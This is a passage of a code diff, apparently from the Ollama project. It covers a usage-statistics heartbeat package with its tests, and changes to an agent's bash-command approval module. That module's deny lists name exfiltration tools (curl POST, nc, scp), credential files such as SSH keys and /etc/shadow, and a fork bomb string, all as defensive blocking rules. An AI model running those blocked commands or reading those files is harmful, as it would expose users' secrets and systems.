Architecture string // model architecture (e.g., "llama", "qwen2")
APIType string // "native" or "openai_compat"
PromptTokens int
CompletionTokens int
UsedTools bool
StructuredOutput bool
}
// SystemInfo contains hardware information to report.
type SystemInfo struct {
OS string `json:"os"`
Arch string `json:"arch"`
CPUCores int `json:"cpu_cores"`
RAMBytes uint64 `json:"ram_bytes"`
GPUs []GPU `json:"gpus,omitempty"`
}
// GPU contains information about a GPU.
type GPU struct {
Name string `json:"name"`
VRAMBytes uint64 `json:"vram_bytes"`
ComputeMajor int `json:"compute_major,omitempty"`
ComputeMinor int `json:"compute_minor,omitempty"`
DriverMajor int `json:"driver_major,omitempty"`
DriverMinor int `json:"driver_minor,omitempty"`
}
// Payload is the data sent to the heartbeat endpoint.
type Payload struct {
Version string `json:"version"`
Time time.Time `json:"time"`
System SystemInfo `json:"system"`
Totals struct {
Requests int64 `json:"requests"`
Errors int64 `json:"errors"`
InputTokens int64 `json:"input_tokens"`
OutputTokens int64 `json:"output_tokens"`
} `json:"totals"`
Endpoints map[string]int64 `json:"endpoints"`
Architectures map[string]int64 `json:"architectures"`
APIs map[string]int64 `json:"apis"`
Features struct {
ToolCalls int64 `json:"tool_calls"`
StructuredOutput int64 `json:"structured_output"`
} `json:"features"`
}
const (
defaultInterval = 1 * time.Hour
)
// New creates a new Stats instance.
func New(opts ...Option) *Stats {
t := &Stats{
endpoints: make(map[string]int64),
architectures: make(map[string]int64),
apis: make(map[string]int64),
models: make(map[string]*ModelStats),
stopCh: make(chan struct{}),
doneCh: make(chan struct{}),
interval: defaultInterval,
}
for _, opt := range opts {
opt(t)
}
return t
}
// Option configures the Stats instance.
type Option func(*Stats)
// WithInterval sets the reporting interval.
func WithInterval(d time.Duration) Option {
return func(t *Stats) {
t.interval = d
}
}
// Record records a request. This is the hot path and should be fast.
func (t *Stats) Record(r *Request) {
t.requestsTotal.Add(1)
t.tokensPrompt.Add(int64(r.PromptTokens))
t.tokensCompletion.Add(int64(r.CompletionTokens))
if r.UsedTools {
t.toolCalls.Add(1)
}
if r.StructuredOutput {
t.structuredOutput.Add(1)
}
t.mu.Lock()
t.endpoints[r.Endpoint]++
t.architectures[r.Architecture]++
t.apis[r.APIType]++
// Track per-model stats
if r.Model != "" {
if t.models[r.Model] == nil {
t.models[r.Model] = &ModelStats{}
}
t.models[r.Model].Requests++
t.models[r.Model].TokensInput += int64(r.PromptTokens)
t.models[r.Model].TokensOutput += int64(r.CompletionTokens)
}
t.mu.Unlock()
}
// RecordError records a failed request.
func (t *Stats) RecordError() {
t.errorsTotal.Add(1)
}
// GetModelStats returns a copy of per-model statistics.
func (t *Stats) GetModelStats() map[string]*ModelStats {
t.mu.RLock()
defer t.mu.RUnlock()
result := make(map[string]*ModelStats, len(t.models))
for k, v := range t.models {
result[k] = &ModelStats{
Requests: v.Requests,
TokensInput: v.TokensInput,
TokensOutput: v.TokensOutput,
}
}
return result
}
// View returns current stats without resetting counters.
func (t *Stats) View() *Payload {
t.mu.RLock()
defer t.mu.RUnlock()
now := time.Now()
// Copy maps
endpoints := make(map[string]int64, len(t.endpoints))
for k, v := range t.endpoints {
endpoints[k] = v
}
architectures := make(map[string]int64, len(t.architectures))
for k, v := range t.architectures {
architectures[k] = v
}
apis := make(map[string]int64, len(t.apis))
for k, v := range t.apis {
apis[k] = v
}
p := &Payload{
Version: version.Version,
Time: now,
System: getSystemInfo(),
Endpoints: endpoints,
Architectures: architectures,
APIs: apis,
}
p.Totals.Requests = t.requestsTotal.Load()
p.Totals.Errors = t.errorsTotal.Load()
p.Totals.InputTokens = t.tokensPrompt.Load()
p.Totals.OutputTokens = t.tokensCompletion.Load()
p.Features.ToolCalls = t.toolCalls.Load()
p.Features.StructuredOutput = t.structuredOutput.Load()
return p
}
// Snapshot returns current stats and resets counters.
func (t *Stats) Snapshot() *Payload {
t.mu.Lock()
defer t.mu.Unlock()
now := time.Now()
p := &Payload{
Version: version.Version,
Time: now,
System: getSystemInfo(),
Endpoints: t.endpoints,
Architectures: t.architectures,
APIs: t.apis,
}
p.Totals.Requests = t.requestsTotal.Swap(0)
p.Totals.Errors = t.errorsTotal.Swap(0)
p.Totals.InputTokens = t.tokensPrompt.Swap(0)
p.Totals.OutputTokens = t.tokensCompletion.Swap(0)
p.Features.ToolCalls = t.toolCalls.Swap(0)
p.Features.StructuredOutput = t.structuredOutput.Swap(0)
// Reset maps
t.endpoints = make(map[string]int64)
t.architectures = make(map[string]int64)
t.apis = make(map[string]int64)
return p
}
// getSystemInfo collects hardware information.
func getSystemInfo() SystemInfo {
info := SystemInfo{
OS: runtime.GOOS,
Arch: runtime.GOARCH,
}
// Get CPU and memory info
sysInfo := discover.GetSystemInfo()
info.CPUCores = sysInfo.ThreadCount
info.RAMBytes = sysInfo.TotalMemory
// Get GPU info
gpus := getGPUInfo()
info.GPUs = gpus
return info
}
// GPUInfoFunc is a function that returns GPU information.
// It's set by the server package after GPU discovery.
var GPUInfoFunc func() []GPU
// getGPUInfo collects GPU information.
func getGPUInfo() []GPU {
if GPUInfoFunc != nil {
return GPUInfoFunc()
}
return nil
}
// Start begins the periodic reporting goroutine.
func (t *Stats) Start() {
go t.reportLoop()
}
// Stop stops reporting and waits for the final report.
func (t *Stats) Stop() {
close(t.stopCh)
<-t.doneCh
}
// reportLoop runs the periodic reporting.
func (t *Stats) reportLoop() {
defer close(t.doneCh)
ticker := time.NewTicker(t.interval)
defer ticker.Stop()
for {
select {
case <-ticker.C:
t.report()
case <-t.stopCh:
// Send final report before stopping
t.report()
return
}
}
}
// report sends usage stats and checks for updates.
func (t *Stats) report() {
payload := t.Snapshot()
t.sendHeartbeat(payload)
}

194
server/usage/usage_test.go Normal file
View File

@@ -0,0 +1,194 @@
package usage
import (
"testing"
)
func TestNew(t *testing.T) {
stats := New()
if stats == nil {
t.Fatal("New() returned nil")
}
}
func TestRecord(t *testing.T) {
stats := New()
stats.Record(&Request{
Model: "llama3:8b",
Endpoint: "chat",
Architecture: "llama",
APIType: "native",
PromptTokens: 100,
CompletionTokens: 50,
UsedTools: true,
StructuredOutput: false,
})
// Check totals
payload := stats.View()
if payload.Totals.Requests != 1 {
t.Errorf("expected 1 request, got %d", payload.Totals.Requests)
}
if payload.Totals.InputTokens != 100 {
t.Errorf("expected 100 prompt tokens, got %d", payload.Totals.InputTokens)
}
if payload.Totals.OutputTokens != 50 {
t.Errorf("expected 50 completion tokens, got %d", payload.Totals.OutputTokens)
}
if payload.Features.ToolCalls != 1 {
t.Errorf("expected 1 tool call, got %d", payload.Features.ToolCalls)
}
if payload.Features.StructuredOutput != 0 {
t.Errorf("expected 0 structured outputs, got %d", payload.Features.StructuredOutput)
}
}
func TestGetModelStats(t *testing.T) {
stats := New()
// Record requests for multiple models
stats.Record(&Request{
Model: "llama3:8b",
PromptTokens: 100,
CompletionTokens: 50,
})
stats.Record(&Request{
Model: "llama3:8b",
PromptTokens: 200,
CompletionTokens: 100,
})
stats.Record(&Request{
Model: "mistral:7b",
PromptTokens: 50,
CompletionTokens: 25,
})
modelStats := stats.GetModelStats()
// Check llama3:8b stats
llama := modelStats["llama3:8b"]
if llama == nil {
t.Fatal("expected llama3:8b stats")
}
if llama.Requests != 2 {
t.Errorf("expected 2 requests for llama3:8b, got %d", llama.Requests)
}
if llama.TokensInput != 300 {
t.Errorf("expected 300 input tokens for llama3:8b, got %d", llama.TokensInput)
}
if llama.TokensOutput != 150 {
t.Errorf("expected 150 output tokens for llama3:8b, got %d", llama.TokensOutput)
}
// Check mistral:7b stats
mistral := modelStats["mistral:7b"]
if mistral == nil {
t.Fatal("expected mistral:7b stats")
}
if mistral.Requests != 1 {
t.Errorf("expected 1 request for mistral:7b, got %d", mistral.Requests)
}
if mistral.TokensInput != 50 {
t.Errorf("expected 50 input tokens for mistral:7b, got %d", mistral.TokensInput)
}
if mistral.TokensOutput != 25 {
t.Errorf("expected 25 output tokens for mistral:7b, got %d", mistral.TokensOutput)
}
}
func TestRecordError(t *testing.T) {
stats := New()
stats.RecordError()
stats.RecordError()
payload := stats.View()
if payload.Totals.Errors != 2 {
t.Errorf("expected 2 errors, got %d", payload.Totals.Errors)
}
}
func TestView(t *testing.T) {
stats := New()
stats.Record(&Request{
Model: "llama3:8b",
Endpoint: "chat",
Architecture: "llama",
APIType: "native",
})
// First view
_ = stats.View()
// View should not reset counters
payload := stats.View()
if payload.Totals.Requests != 1 {
t.Errorf("View should not reset counters, expected 1 request, got %d", payload.Totals.Requests)
}
}
func TestSnapshot(t *testing.T) {
stats := New()
stats.Record(&Request{
Model: "llama3:8b",
Endpoint: "chat",
PromptTokens: 100,
CompletionTokens: 50,
})
// Snapshot should return data and reset counters
snapshot := stats.Snapshot()
if snapshot.Totals.Requests != 1 {
t.Errorf("expected 1 request in snapshot, got %d", snapshot.Totals.Requests)
}
// After snapshot, counters should be reset
payload2 := stats.View()
if payload2.Totals.Requests != 0 {
t.Errorf("expected 0 requests after snapshot, got %d", payload2.Totals.Requests)
}
}
func TestConcurrentAccess(t *testing.T) {
stats := New()
done := make(chan bool)
// Concurrent writes
for i := 0; i < 10; i++ {
go func() {
for j := 0; j < 100; j++ {
stats.Record(&Request{
Model: "llama3:8b",
PromptTokens: 10,
CompletionTokens: 5,
})
}
done <- true
}()
}
// Concurrent reads
for i := 0; i < 5; i++ {
go func() {
for j := 0; j < 100; j++ {
_ = stats.View()
_ = stats.GetModelStats()
}
done <- true
}()
}
// Wait for all goroutines
for i := 0; i < 15; i++ {
<-done
}
payload := stats.View()
if payload.Totals.Requests != 1000 {
t.Errorf("expected 1000 requests, got %d", payload.Totals.Requests)
}
}

View File

@@ -1,24 +0,0 @@
# Experimental Features
## MLX Backend
We're working on a new experimental backend based on the [MLX project](https://github.com/ml-explore/mlx)
Support is currently limited to MacOS and Linux with CUDA GPUs. We're looking to add support for Windows CUDA soon, and other GPU vendors. To build:
```
cmake --preset MLX
cmake --build --preset MLX --parallel
cmake --install --component MLX
go build -tags mlx .
```
On linux, use the preset "MLX CUDA 13" or "MLX CUDA 12" to enable CUDA with the default Ollama NVIDIA GPU architectures enabled.
## Image Generation
Based on the experimental MLX backend, we're working on adding imagegen support. After running the cmake commands above:
```
go build -o imagegen ./x/imagegen/cmd/engine
```

View File

@@ -33,29 +33,10 @@ type ApprovalResult struct {
// Option labels for the selector (numbered for quick selection)
var optionLabels = []string{
"1. Execute once",
"2. Allow for this session",
"2. Always allow",
"3. Deny",
}
// toolDisplayNames maps internal tool names to human-readable display names.
var toolDisplayNames = map[string]string{
"bash": "Bash",
"web_search": "Web Search",
}
// ToolDisplayName returns the human-readable display name for a tool.
func ToolDisplayName(toolName string) string {
if displayName, ok := toolDisplayNames[toolName]; ok {
return displayName
}
// Default: capitalize first letter and replace underscores with spaces
name := strings.ReplaceAll(toolName, "_", " ")
if len(name) > 0 {
return strings.ToUpper(name[:1]) + name[1:]
}
return toolName
}
// autoAllowCommands are commands that are always allowed without prompting.
// These are zero-risk, read-only commands.
var autoAllowCommands = map[string]bool{
@@ -70,6 +51,9 @@ var autoAllowCommands = map[string]bool{
// autoAllowPrefixes are command prefixes that are always allowed.
// These are read-only or commonly-needed development commands.
var autoAllowPrefixes = []string{
// Git read-only
"git status", "git log", "git diff", "git branch", "git show",
"git remote -v", "git tag", "git stash list",
// Package managers - run scripts
"npm run", "npm test", "npm start",
"bun run", "bun test",
@@ -88,9 +72,6 @@ var autoAllowPrefixes = []string{
}
// denyPatterns are dangerous command patterns that are always blocked.
// NOTE: Some network patterns (curl POST, scp, rsync) moved to warnPatterns
// to allow user escalation with explicit approval.
// These patterns use word boundary matching to avoid false positives (e.g., "nc " won't match "rsync").
var denyPatterns = []string{
// Destructive commands
"rm -rf", "rm -fr",
@@ -101,8 +82,19 @@ var denyPatterns = []string{
"sudo ", "su ", "doas ",
"chmod 777", "chmod -R 777",
"chown ", "chgrp ",
// Network tools (raw sockets - still blocked)
// Network exfiltration
"curl -d", "curl --data", "curl -X POST", "curl -X PUT",
"wget --post",
"nc ", "netcat ",
"scp ", "rsync ",
// History and credentials
"history",
".bash_history", ".zsh_history",
".ssh/id_rsa", ".ssh/id_dsa", ".ssh/id_ecdsa", ".ssh/id_ed25519",
".ssh/config",
".aws/credentials", ".aws/config",
".gnupg/",
"/etc/shadow", "/etc/passwd",
// Dangerous patterns
":(){ :|:& };:", // fork bomb
"chmod +s", // setuid
@@ -110,20 +102,11 @@ var denyPatterns = []string{
}
// denyPathPatterns are file patterns that should never be accessed.
// These are checked using simple substring matching.
// These are checked as exact filename matches or path suffixes.
var denyPathPatterns = []string{
// History files
"history",
".bash_history", ".zsh_history",
// SSH keys and config
".ssh/id_rsa", ".ssh/id_dsa", ".ssh/id_ecdsa", ".ssh/id_ed25519",
".ssh/config",
// Cloud credentials
".aws/credentials", ".aws/config",
".gnupg/",
// System credentials
"/etc/shadow", "/etc/passwd",
// Secrets files
".env",
".env.local",
".env.production",
"credentials.json",
"secrets.json",
"secrets.yaml",
@@ -132,25 +115,6 @@ var denyPathPatterns = []string{
".key",
}
// warnPatterns are patterns that require explicit approval with warning.
// These are potentially risky but legitimate in some contexts.
// Unlike denyPatterns, these show a warning but allow user approval.
var warnPatterns = []string{
// Network operations (user may need for legitimate API testing)
"curl -d", "curl --data", "curl -X POST", "curl -X PUT",
"wget --post",
// File transfer (user may need for deployments)
"scp ", "rsync ",
}
// warnPathPatterns are file patterns that require explicit approval with warning.
// Unlike denyPathPatterns, these show a warning but allow user approval.
var warnPathPatterns = []string{
".env",
".env.local",
".env.production",
}
// ApprovalManager manages tool execution approvals.
type ApprovalManager struct {
allowlist map[string]bool // exact matches
@@ -193,8 +157,7 @@ func IsDenied(command string) (bool, string) {
// Check deny patterns
for _, pattern := range denyPatterns {
patternLower := strings.ToLower(pattern)
if containsWord(commandLower, patternLower) {
if strings.Contains(commandLower, strings.ToLower(pattern)) {
return true, pattern
}
}
@@ -209,57 +172,6 @@ func IsDenied(command string) (bool, string) {
return false, ""
}
// containsWord checks if a command contains a pattern as a word/command.
// This handles patterns like "nc " which should match "nc -l 8080" but not "rsync -avz".
// The pattern is considered a match if:
// - It appears at the start of the command, OR
// - It's preceded by a space, pipe, semicolon, or other delimiter
func containsWord(command, pattern string) bool {
// Simple contains check first
if !strings.Contains(command, pattern) {
return false
}
// Check if pattern is at the start
if strings.HasPrefix(command, pattern) {
return true
}
// Check if pattern is preceded by a delimiter (space, pipe, semicolon, &, etc.)
delimiters := []string{" ", "|", ";", "&", "(", "`", "$"}
for _, delim := range delimiters {
if strings.Contains(command, delim+pattern) {
return true
}
}
return false
}
// IsWarn checks if a bash command matches warning patterns.
// These are patterns that require explicit user approval with a warning,
// but are not completely blocked like deny patterns.
// Returns true and the matched pattern if it should warn.
func IsWarn(command string) (bool, string) {
commandLower := strings.ToLower(command)
// Check warn patterns
for _, pattern := range warnPatterns {
if strings.Contains(commandLower, strings.ToLower(pattern)) {
return true, pattern
}
}
// Check warn path patterns
for _, pattern := range warnPathPatterns {
if strings.Contains(commandLower, strings.ToLower(pattern)) {
return true, pattern
}
}
return false, ""
}
// FormatDeniedResult returns the tool result message when a command is blocked.
func FormatDeniedResult(command string, pattern string) string {
return fmt.Sprintf("Command blocked: this command matches a dangerous pattern (%s) and cannot be executed. If this command is necessary, please ask the user to run it manually.", pattern)
@@ -267,7 +179,6 @@ func FormatDeniedResult(command string, pattern string) string {
// extractBashPrefix extracts a prefix pattern from a bash command.
// For commands like "cat tools/tools_test.go | head -200", returns "cat:tools/"
// For git commands like "git log x/agent/", returns "git log:x/agent/" (includes subcommand)
// For commands without path args, returns empty string.
// Paths with ".." traversal that escape the base directory return empty string for security.
func extractBashPrefix(command string) string {
@@ -289,30 +200,12 @@ func extractBashPrefix(command string) string {
"less": true, "more": true, "file": true, "wc": true,
"grep": true, "find": true, "tree": true, "stat": true,
"sed": true,
"git": true, // git commands with path args (e.g., git log x/agent/)
}
if !safeCommands[baseCmd] {
return ""
}
// For git commands, extract the subcommand for more granular allowlisting
var subCmd string
if baseCmd == "git" && len(fields) >= 2 {
// Git subcommand is the second field (e.g., "log", "status", "diff")
// Skip options like "-v" - the first non-option argument is the subcommand
for _, arg := range fields[1:] {
if !strings.HasPrefix(arg, "-") {
subCmd = arg
break
}
}
// If no subcommand found (unlikely for git), use empty string
if subCmd == "" {
subCmd = "unknown"
}
}
// Find the first path-like argument (must contain / or \ or start with .)
// First pass: look for clear paths (containing path separators or starting with .)
for _, arg := range fields[1:] {
@@ -324,10 +217,6 @@ func extractBashPrefix(command string) string {
if isNumeric(arg) {
continue
}
// For git, skip the subcommand itself when looking for paths
if baseCmd == "git" && arg == subCmd {
continue
}
// Only process if it looks like a path (contains / or \ or starts with .)
if !strings.Contains(arg, "/") && !strings.Contains(arg, "\\") && !strings.HasPrefix(arg, ".") {
continue
@@ -369,13 +258,6 @@ func extractBashPrefix(command string) string {
dir = path.Dir(cleaned)
}
// Build prefix with subcommand for git, or just baseCmd for others
if baseCmd == "git" {
if dir == "." {
return fmt.Sprintf("git %s:./", subCmd)
}
return fmt.Sprintf("git %s:%s/", subCmd, dir)
}
if dir == "." {
return fmt.Sprintf("%s:./", baseCmd)
}
@@ -383,7 +265,6 @@ func extractBashPrefix(command string) string {
}
// Second pass: if no clear path found, use the first non-flag argument as a filename
// For git, we still allow ./ prefix even without path args (git status, git stash, etc.)
for _, arg := range fields[1:] {
if strings.HasPrefix(arg, "-") {
continue
@@ -391,12 +272,6 @@ func extractBashPrefix(command string) string {
if isNumeric(arg) {
continue
}
// For git, skip the subcommand when checking for path args
if baseCmd == "git" && arg == subCmd {
// Git commands without path args (git status, git stash, etc.)
// Still return a prefix with subcommand and current directory
return fmt.Sprintf("git %s:./", subCmd)
}
// Treat as filename in current dir
return fmt.Sprintf("%s:./", baseCmd)
}
@@ -600,45 +475,16 @@ func (a *ApprovalManager) RequestApproval(toolName string, args map[string]any)
// This prevents buffered input from causing double-press issues
flushStdin(fd)
// Check if bash command should show warning
// Warning is shown for: commands outside cwd, or commands matching warn patterns
// Check if bash command targets paths outside cwd
isWarning := false
var warningMsg string
var allowlistInfo string
if toolName == "bash" {
if cmd, ok := args["command"].(string); ok {
// Check for outside cwd warning
if isCommandOutsideCwd(cmd) {
isWarning = true
warningMsg = "command targets paths outside project"
}
// Check for warn patterns (curl POST, scp, rsync, .env files)
if warned, pattern := IsWarn(cmd); warned {
isWarning = true
warningMsg = fmt.Sprintf("matches warning pattern: %s", pattern)
}
// Generate allowlist info for display
prefix := extractBashPrefix(cmd)
if prefix != "" {
// Parse prefix format "cmd:path/" into command and directory
colonIdx := strings.Index(prefix, ":")
if colonIdx != -1 {
cmdName := prefix[:colonIdx]
dirPath := prefix[colonIdx+1:]
// Include "(includes subdirs)" for directories that allow hierarchical matching
// ./ is special - it only allows files in current dir, not subdirs
if dirPath != "./" {
allowlistInfo = fmt.Sprintf("Allow for this session: %s in %s directory (includes subdirs)", cmdName, dirPath)
} else {
allowlistInfo = fmt.Sprintf("Allow for this session: %s in %s directory", cmdName, dirPath)
}
}
}
isWarning = isCommandOutsideCwd(cmd)
}
}
// Run interactive selector
selected, denyReason, err := runSelector(fd, oldState, toolDisplay, isWarning, warningMsg, allowlistInfo)
selected, denyReason, err := runSelector(fd, oldState, toolDisplay, isWarning)
if err != nil {
term.Restore(fd, oldState)
return ApprovalResult{Decision: ApprovalDeny}, err
@@ -663,12 +509,11 @@ func (a *ApprovalManager) RequestApproval(toolName string, args map[string]any)
// formatToolDisplay creates the display string for a tool call.
func formatToolDisplay(toolName string, args map[string]any) string {
var sb strings.Builder
displayName := ToolDisplayName(toolName)
// For bash, show command directly
if toolName == "bash" {
if cmd, ok := args["command"].(string); ok {
sb.WriteString(fmt.Sprintf("Tool: %s\n", displayName))
sb.WriteString(fmt.Sprintf("Tool: %s\n", toolName))
sb.WriteString(fmt.Sprintf("Command: %s", cmd))
return sb.String()
}
@@ -677,7 +522,7 @@ func formatToolDisplay(toolName string, args map[string]any) string {
// For web search, show query and internet notice
if toolName == "web_search" {
if query, ok := args["query"].(string); ok {
sb.WriteString(fmt.Sprintf("Tool: %s\n", displayName))
sb.WriteString(fmt.Sprintf("Tool: %s\n", toolName))
sb.WriteString(fmt.Sprintf("Query: %s\n", query))
sb.WriteString("Uses internet via ollama.com")
return sb.String()
@@ -685,7 +530,7 @@ func formatToolDisplay(toolName string, args map[string]any) string {
}
// Generic display
sb.WriteString(fmt.Sprintf("Tool: %s", displayName))
sb.WriteString(fmt.Sprintf("Tool: %s", toolName))
if len(args) > 0 {
sb.WriteString("\nArguments: ")
first := true
@@ -702,28 +547,24 @@ func formatToolDisplay(toolName string, args map[string]any) string {
// selectorState holds the state for the interactive selector
type selectorState struct {
toolDisplay string
selected int
totalLines int
termWidth int
termHeight int
boxWidth int
innerWidth int
denyReason string // deny reason (always visible in box)
isWarning bool // true if command has warning
warningMessage string // dynamic warning message to display
allowlistInfo string // show what will be allowlisted (for "Always allow" option)
toolDisplay string
selected int
totalLines int
termWidth int
termHeight int
boxWidth int
innerWidth int
denyReason string // deny reason (always visible in box)
isWarning bool // true if command targets paths outside cwd (red box)
}
// runSelector runs the interactive selector and returns the selected index and optional deny reason.
// If isWarning is true, the box is rendered in red to indicate the command targets paths outside cwd.
func runSelector(fd int, oldState *term.State, toolDisplay string, isWarning bool, warningMessage string, allowlistInfo string) (int, string, error) {
func runSelector(fd int, oldState *term.State, toolDisplay string, isWarning bool) (int, string, error) {
state := &selectorState{
toolDisplay: toolDisplay,
selected: 0,
isWarning: isWarning,
warningMessage: warningMessage,
allowlistInfo: allowlistInfo,
toolDisplay: toolDisplay,
selected: 0,
isWarning: isWarning,
}
// Get terminal size
@@ -883,7 +724,7 @@ func wrapText(text string, maxWidth int) []string {
// getHintLines returns the hint text wrapped to terminal width
func getHintLines(state *selectorState) []string {
hint := "up/down select, enter confirm, 1-3 quick select, ctrl+c cancel"
hint := "↑/↓ navigate, Enter confirm, 1-3 quick, Ctrl+C cancel"
if state.termWidth >= len(hint)+1 {
return []string{hint}
}
@@ -893,73 +734,86 @@ func getHintLines(state *selectorState) []string {
// calculateTotalLines calculates how many lines the selector will use
func calculateTotalLines(state *selectorState) int {
toolLines := strings.Split(state.toolDisplay, "\n")
toolLines := wrapText(state.toolDisplay, state.innerWidth)
hintLines := getHintLines(state)
// warning line (if applicable) + tool lines + blank line + options + blank line + hint lines
// top border + (warning line if applicable) + tool lines + separator + options + bottom border + hint lines
warningLines := 0
if state.isWarning {
warningLines = 2 // warning line + blank line after
warningLines = 1
}
return warningLines + len(toolLines) + 1 + len(optionLabels) + 1 + len(hintLines)
return 1 + warningLines + len(toolLines) + 1 + len(optionLabels) + 1 + len(hintLines)
}
// renderSelectorBox renders the selector (minimal, no box)
// renderSelectorBox renders the complete selector box
func renderSelectorBox(state *selectorState) {
toolLines := strings.Split(state.toolDisplay, "\n")
toolLines := wrapText(state.toolDisplay, state.innerWidth)
hintLines := getHintLines(state)
// Draw warning line if needed
// Use red for warning (outside cwd), cyan for normal
boxColor := "\033[36m" // cyan
if state.isWarning {
if state.warningMessage != "" {
fmt.Fprintf(os.Stderr, "\033[1mwarning:\033[0m %s\033[K\r\n", state.warningMessage)
} else {
fmt.Fprintf(os.Stderr, "\033[1mwarning:\033[0m command targets paths outside project\033[K\r\n")
}
fmt.Fprintf(os.Stderr, "\033[K\r\n") // blank line after warning
boxColor = "\033[91m" // bright red
}
// Draw tool info (plain white)
// Draw box top
fmt.Fprintf(os.Stderr, "%s┌%s┐\033[0m\033[K\r\n", boxColor, strings.Repeat("─", state.boxWidth-2))
// Draw warning line if needed (inside the box)
if state.isWarning {
warning := "!! OUTSIDE PROJECT !!"
padding := (state.innerWidth - len(warning)) / 2
if padding < 0 {
padding = 0
}
fmt.Fprintf(os.Stderr, "%s│\033[0m %s%s%s %s│\033[0m\033[K\r\n", boxColor,
strings.Repeat(" ", padding), warning, strings.Repeat(" ", state.innerWidth-len(warning)-padding), boxColor)
}
// Draw tool info
for _, line := range toolLines {
fmt.Fprintf(os.Stderr, "%s\033[K\r\n", line)
fmt.Fprintf(os.Stderr, "%s│\033[0m %-*s %s│\033[0m\033[K\r\n", boxColor, state.innerWidth, line, boxColor)
}
// Blank line separator
fmt.Fprintf(os.Stderr, "\033[K\r\n")
// Draw separator
fmt.Fprintf(os.Stderr, "%s├%s┤\033[0m\033[K\r\n", boxColor, strings.Repeat("─", state.boxWidth-2))
// Draw options
// Draw options with numbers (Deny option includes reason input)
for i, label := range optionLabels {
if i == 2 { // Deny option with input
if i == 2 { // Deny option - show with reason input beside it
denyLabel := "3. Deny: "
// Show placeholder if empty, actual input if typing
availableWidth := state.innerWidth - 2 - len(denyLabel)
if availableWidth < 5 {
availableWidth = 5
}
inputDisplay := state.denyReason
if inputDisplay == "" {
inputDisplay = "\033[90m(optional reason)\033[0m"
if len(inputDisplay) > availableWidth {
inputDisplay = inputDisplay[len(inputDisplay)-availableWidth:]
}
if i == state.selected {
fmt.Fprintf(os.Stderr, " \033[1m%s\033[0m%s\033[K\r\n", denyLabel, inputDisplay)
fmt.Fprintf(os.Stderr, "%s│\033[0m \033[1;32m> %s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor)
} else {
fmt.Fprintf(os.Stderr, " \033[37m%s\033[0m%s\033[K\r\n", denyLabel, inputDisplay)
fmt.Fprintf(os.Stderr, "%s│\033[0m \033[90m%s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor)
}
} else {
// Show allowlist info beside "Allow for this session" (index 1)
displayLabel := label
if i == 1 && state.allowlistInfo != "" {
displayLabel = fmt.Sprintf("%s \033[90m%s\033[0m", label, state.allowlistInfo)
if len(displayLabel) > state.innerWidth-2 {
displayLabel = displayLabel[:state.innerWidth-5] + "..."
}
if i == state.selected {
fmt.Fprintf(os.Stderr, " \033[1m%s\033[0m\033[K\r\n", displayLabel)
fmt.Fprintf(os.Stderr, "%s│\033[0m \033[1;32m> %-*s\033[0m %s│\033[0m\033[K\r\n", boxColor, state.innerWidth-2, displayLabel, boxColor)
} else {
fmt.Fprintf(os.Stderr, " \033[37m%s\033[0m\033[K\r\n", displayLabel)
fmt.Fprintf(os.Stderr, "%s│\033[0m %-*s %s\033[0m\033[K\r\n", boxColor, state.innerWidth-2, displayLabel, boxColor)
}
}
}
// Blank line before hint
fmt.Fprintf(os.Stderr, "\033[K\r\n")
// Draw box bottom
fmt.Fprintf(os.Stderr, "%s└%s┘\033[0m\033[K\r\n", boxColor, strings.Repeat("─", state.boxWidth-2))
// Draw hint (dark grey)
// Draw hint (may be multiple lines)
for i, line := range hintLines {
if i == len(hintLines)-1 {
// Last line - no newline
fmt.Fprintf(os.Stderr, "\033[90m%s\033[0m\033[K", line)
} else {
fmt.Fprintf(os.Stderr, "\033[90m%s\033[0m\033[K\r\n", line)
@@ -971,41 +825,50 @@ func renderSelectorBox(state *selectorState) {
func updateSelectorOptions(state *selectorState) {
hintLines := getHintLines(state)
// Use red for warning (outside cwd), cyan for normal
boxColor := "\033[36m" // cyan
if state.isWarning {
boxColor = "\033[91m" // bright red
}
// Move up to the first option line
// Cursor is at end of last hint line, need to go up:
// (hint lines - 1) + 1 (blank line) + numOptions
// (hint lines - 1) + 1 (bottom border) + numOptions
linesToMove := len(hintLines) - 1 + 1 + len(optionLabels)
fmt.Fprintf(os.Stderr, "\033[%dA\r", linesToMove)
// Redraw options
// Redraw options (Deny option includes reason input)
for i, label := range optionLabels {
if i == 2 { // Deny option
denyLabel := "3. Deny: "
availableWidth := state.innerWidth - 2 - len(denyLabel)
if availableWidth < 5 {
availableWidth = 5
}
inputDisplay := state.denyReason
if inputDisplay == "" {
inputDisplay = "\033[90m(optional reason)\033[0m"
if len(inputDisplay) > availableWidth {
inputDisplay = inputDisplay[len(inputDisplay)-availableWidth:]
}
if i == state.selected {
fmt.Fprintf(os.Stderr, " \033[1m%s\033[0m%s\033[K\r\n", denyLabel, inputDisplay)
fmt.Fprintf(os.Stderr, "%s│\033[0m \033[1;32m> %s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor)
} else {
fmt.Fprintf(os.Stderr, " \033[37m%s\033[0m%s\033[K\r\n", denyLabel, inputDisplay)
fmt.Fprintf(os.Stderr, "%s│\033[0m \033[90m%s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor)
}
} else {
// Show allowlist info beside "Allow for this session" (index 1)
displayLabel := label
if i == 1 && state.allowlistInfo != "" {
displayLabel = fmt.Sprintf("%s \033[90m%s\033[0m", label, state.allowlistInfo)
if len(displayLabel) > state.innerWidth-2 {
displayLabel = displayLabel[:state.innerWidth-5] + "..."
}
if i == state.selected {
fmt.Fprintf(os.Stderr, " \033[1m%s\033[0m\033[K\r\n", displayLabel)
fmt.Fprintf(os.Stderr, "%s│\033[0m \033[1;32m> %-*s\033[0m %s│\033[0m\033[K\r\n", boxColor, state.innerWidth-2, displayLabel, boxColor)
} else {
fmt.Fprintf(os.Stderr, " \033[37m%s\033[0m\033[K\r\n", displayLabel)
fmt.Fprintf(os.Stderr, "%s│\033[0m %-*s %s\033[0m\033[K\r\n", boxColor, state.innerWidth-2, displayLabel, boxColor)
}
}
}
// Blank line + hint
fmt.Fprintf(os.Stderr, "\033[K\r\n")
// Redraw bottom and hint
fmt.Fprintf(os.Stderr, "%s└%s┘\033[0m\033[K\r\n", boxColor, strings.Repeat("─", state.boxWidth-2))
for i, line := range hintLines {
if i == len(hintLines)-1 {
